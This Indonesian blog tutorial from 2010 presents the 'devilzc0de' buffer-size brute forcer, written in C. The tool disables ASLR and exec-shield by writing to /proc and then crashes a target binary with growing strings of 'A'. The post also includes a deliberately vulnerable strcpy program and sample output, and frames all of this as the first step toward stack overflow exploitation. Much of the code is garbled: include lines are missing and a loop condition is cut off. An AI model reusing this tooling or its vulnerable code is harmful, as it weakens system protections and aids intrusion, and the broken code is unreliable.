Sabtu, 20 Maret 2010
Teknik Brute Force Buffer Size
Penulis: mywisdom
Yang diperlukan:
- devilzc0de_bbf.c (devilzc0de buffer size brute force)
perhatian, ini maksudnya bukan devilzcode boys before flowers.
- kompiler gcc
- OS Linux
Download: http://yoyoparty.com/upload/devilzc0de_bbf.c>http://yoyoparty.com/upload/devilzc0de_bbf.c
Ok kembali lagi bersama saya, mungkin Anda semua sudah bosan, mual dan muak melihat orang yg 1 ini.
Kali ini kita akan mengadakan eksperimen brute force terhadap ukuran buffer dari suatu elf binary yang membutuhkan argumen tambahan terhadap bug buffer overflow. Bagi Anda yang jago reverse engineering tidak dianjurkan membaca artikel ini. Artikel ini ditujukan untuk pemula yang malas atau belum jago reverse engineering.
Ok berikut ini adalah soruce code tool yang akan kita pakai kali ini:
filename: devilzc0de_bbf.c
Code:
/*
Devilzc0de Buffer Size Brute Forcer version 1.0
programmer: mywisdom (antonsoft_2004@yahoo.com)
Do visit : http://www.devilzc0de.org !
function searching buffer size of a vulnerable elf binary which requires argument(s)
Special thanks: gunslinger, flyv666,kiddies,cruz3n, c0mrade,chaer newbie,devilz_nongkrong,petimati
Special thanks to all my friends
Greet(s):
-devilzc0de crews and members
-jasakom crews and members
-YCL crews and members
-jatimcrews and members
-darkc0de crews and members
-tecon crews and members
etc...
*/
#include
#include
#include
#define PJG 256
#define RESET 0
#define BRIGHT 1
#define DIM 2
#define UNDERLINE 3
#define BLINK 4
#define REVERSE 7
#define HIDDEN 8
#define BLACK 0
#define RED 1
#define GREEN 2
#define YELLOW 3
#define BLUE 4
#define MAGENTA 5
#define CYAN 6
#define WHITE 7
void textcolor(int attr, int fg, int bg);
void textcolor(int attr, int fg, int bg)
{ char command[13];
sprintf(command, "%c[%d;%d;%dm", 0x1B, attr, fg + 30, bg + 40);
printf("%s", command);
}
unsigned long stak_pointer(void)
{
__asm__("movl %esp, %eax");
}
int pipa(char *perintah,int awal)
{
FILE * devilzc0de;
char gunslinger[80];
int lastchar;
int panjang;
int awal2;
awal2=awal;
devilzc0de = popen(perintah, "r");
lastchar = fread(gunslinger, 1, 80, devilzc0de);
gunslinger[lastchar] = '\0';
textcolor(BRIGHT, GREEN, BLACK);
printf("Pipe Result:%s",gunslinger);
panjang = strlen(gunslinger);
textcolor(BRIGHT, WHITE, BLACK);
printf("\nPipe length:%d\n",panjang);
pclose(devilzc0de);
if(panjang<1)
{
if(awal>awal2)
{
textcolor(BRIGHT, YELLOW, BLACK);
printf ("\nPipe stopped !!! possible segmentation fault !\n");
textcolor(BRIGHT, MAGENTA, BLACK);
printf ("Stack Pointer: 0x%x\n", stak_pointer());
textcolor(BRIGHT, BLUE, BLACK);
printf("\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
printf("\n\tW00t! Found possible max buffer size: %d\n",awal);
printf("\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n");
exit(1);
}
else
{
textcolor(BRIGHT, RED, BLACK);
printf("\nSorry not vulnerable !!!\n");
exit(1);
}
}
return 0;
}
int main(int argc,char *argv[])
{
char nama_elf[256];
char start[10];
char end[10];
int awal,akhir,z;
char *perintah;
char *hasil;
char perintah2[256]=" ";
FILE *mywisdom;
FILE *log;
char buff[9999];
char spasi_kosong[0]="";
char spasi[1]=" ";
if(argc<4)
{
textcolor(BRIGHT, BLUE, BLACK);
printf("\n********************************************************************************************************\n");
textcolor(BRIGHT, RED, BLACK);
printf("\t[Devilzc0de Buffer Size Brute Forcer]\n");
textcolor(BRIGHT, GREEN, BLACK);
printf("\tDo Visit www.devilzc0de.org\n");
textcolor(BRIGHT, YELLOW, BLACK);
printf("\tProgrammer: mywisdom (antonsoft_2004@yahoo.com)\n");
textcolor(BRIGHT, CYAN, BLACK);
printf("\tUsage: %s /path/elf_binary low_number high_number\n",argv[0]);
textcolor(BRIGHT, GREEN, BLACK);
printf("\tExample: %s ./vulnerable_elf 1 2000\n",argv[0]);
textcolor(BRIGHT, RED, BLACK);
printf("\tThis will search buffer size of a vulnerable elf binary which requires argument(s)\n");
printf("\tFor more sample usage, visit: http://devilzc0de.org for tutorial(s)");
textcolor(BRIGHT, BLUE, BLACK);
printf("\n********************************************************************************************************\n");
exit(1);
}
else
{
system("echo \"0\" > /proc/sys/kernel/randomize_va_space");
system("echo \"0\" > /proc/sys/kernel/exec-shield");
system("echo \"0\" > /proc/sys/kernel/exec-shield-randomize");
strcpy(nama_elf,argv[1]);
strcpy(start,argv[2]);
strcpy(end,argv[3]);
textcolor(BRIGHT, BLUE, BLACK);
printf("\n********************************************************************************************************\n");
textcolor(BRIGHT, RED, BLACK);
printf("\n\t[Devilzc0de Buffer Size Brute Forcer]\n");
textcolor(BRIGHT, BLUE, BLACK);
printf("\n********************************************************************************************************\n");
textcolor(BRIGHT, GREEN, BLACK);
printf ("\nExecuting : %s",&nama_elf);
perintah=(char *) &nama_elf;
awal=atoi(start);
akhir=atoi(end);
printf("\nStarting length of string:%d\n",awal);
printf("\nEnd length of string:%d\n",akhir);
textcolor(BRIGHT, RED, BLACK);
printf("Searching please wait ...\n");
akhir++;
system("touch mywisdom");
while(awal{
system("echo null>log");
mywisdom = fopen("mywisdom", "w");
textcolor(BRIGHT, CYAN, BLACK);
printf("\nTesting length of input: %d\n",awal);
fprintf(mywisdom,"%s `perl -e 'print \"A\"x%d'`",&nama_elf,awal);
fclose(mywisdom);
mywisdom = fopen("mywisdom", "r");
while(!feof(mywisdom))
{
fgets(perintah2, PJG, mywisdom);
}
textcolor(BRIGHT, RED, BLACK);
printf("Executing command:%s\n",perintah2);
fclose(mywisdom);
pipa(perintah2,awal);
awal++;
}
}
return 0;
}
Code:
gcc -o devilzc0de_bbf devilzc0de_bbf.c
filename: vulner.c
Code:
#include
#include
int main(int argc,char *argv[])
{
char data[10];
if(argc>1)
{
strcpy(data,argv[1]);
printf("Your data:%s\n",&data);
}
else
{
printf("\nArgument must be 2!!!\n");
}
return 0;
}
kompile dg gcc:
Code:
gcc -o vulner vulner.c
yang mengkopi jumlah string yang diinput dari argumen ke buffer.
Ok selanjutnya kita coba run devilzc0de_bbf untuk melihat contoh cara penggunaanya:
Code:
./devilzc0de_bbf
Code:
********************************************************************************************************
[Devilzc0de Buffer Size Brute Forcer]
Do Visit www.devilzc0de.org
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Usage: ./devilzc0de_bbf /path/elf_binary low_number high_number
Example: ./devilzc0de_bbf ./vulnerable_elf 1 2000
This will search buffer size of a vulnerable elf binary which requires argument(s)
For more sample usage, visit: http://devilzc0de.org for tutorial(s)
********************************************************************************************************
Ok untuk mencari ukuran buffer dari program vulner tadi ketikkan , misal:
Code:
./devilzc0de_bbf ./vulner 1 100
kita akan menguji dari ukuran buffer 1 sampai 100
Ok dan hasilnya program berhenti saat pengujian buffer 10 berikut ini:
Code:
Testing length of input: 10
Executing command:./vulner `perl -e 'print "A"x10'`
Pipe Result:
Pipe length:0
Pipe stopped !!! possible segmentation fault !
Stack Pointer: 0xbfffc9f8
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
W00t! Found possible max buffer size: 10
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
bt c #
Yup dapat ukuran buffer sebesar 10
Jadi kita bisa mendapatkan ukuran buffer dari elf binary tanpa harus melakukanya secara manual maupun dengan reverse engineering manual (gdb)
Di mana selanjutnya kita bisa melanjutkan eksploitasi stack based bufer overflow setelah mendapatkan informasi buffer size di atas .
Ok sekian dan terima kasih telah membaca tulisan cupu ini. xixixixi
0 komentar:
Posting Komentar